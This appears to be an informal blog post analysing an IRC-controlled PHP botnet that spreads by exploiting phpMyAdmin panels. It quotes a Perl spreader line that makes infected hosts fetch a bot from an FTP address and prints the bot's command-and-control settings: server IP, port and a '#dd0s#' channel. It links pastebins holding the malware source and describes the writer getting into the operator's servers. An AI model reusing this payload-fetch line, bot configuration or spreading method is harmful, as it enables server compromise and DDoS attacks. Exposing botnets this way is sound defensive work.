Connting to that oort ...
-Lets check security of his server !! oh
Also many connections on that port which IRC serv is running
Got his config and lets join irc ..
Many bots! 26k
/list
2 admin's IP addresses
Now i checked some log's of the infected pc's and found thiss ...
also he is spreading over a script that seraches for weak or no pass mysql php panel's
and infect them also /panel/script/setup.php this is an tool which HF skidds uses
its called the ZmEu masscan later more on that .
Also 14.35.234.212 was his scanning / spreading server
let's see if that better secured ... lolz
you see its an perl script that attacks filtered ip addresses that have
phpmyadmin panel online or vulnarable | ps aux
so located his script /bin/.php/
i attach later a archive whith all his data
see all *.txt files are vuln phpmyadmin panel that can maybe exploited
cat all.pl
http://pastebin.com/JZnMHGGE
i paste just this here
my $url = $host;
my $ftp = "ftp://185.4.29.127/a/0.php";
my $len = length($ftp);
every exploited pc , is forced to download this file over ftp
cat 0.php
http://pastebin.com/g75MAgjz
its a php bot
"server" => "222.216.30.28",
"port" => "3131",
"key" => "*",
"prefix" => "",
"maxrand" => "8",
"chan" => "#dd0s#",
"trigger" => ".",
"hostauth" => "root.edu"
there are some other file's
cat a.php
http://pastebin.com/CKs5fRkv
cat ax.php
http://pastebin.com/GC3dcuyz
cat win.php
http://pastebin.com/3Np2JsYw
More about pma bot Here
No comments:
Post a Comment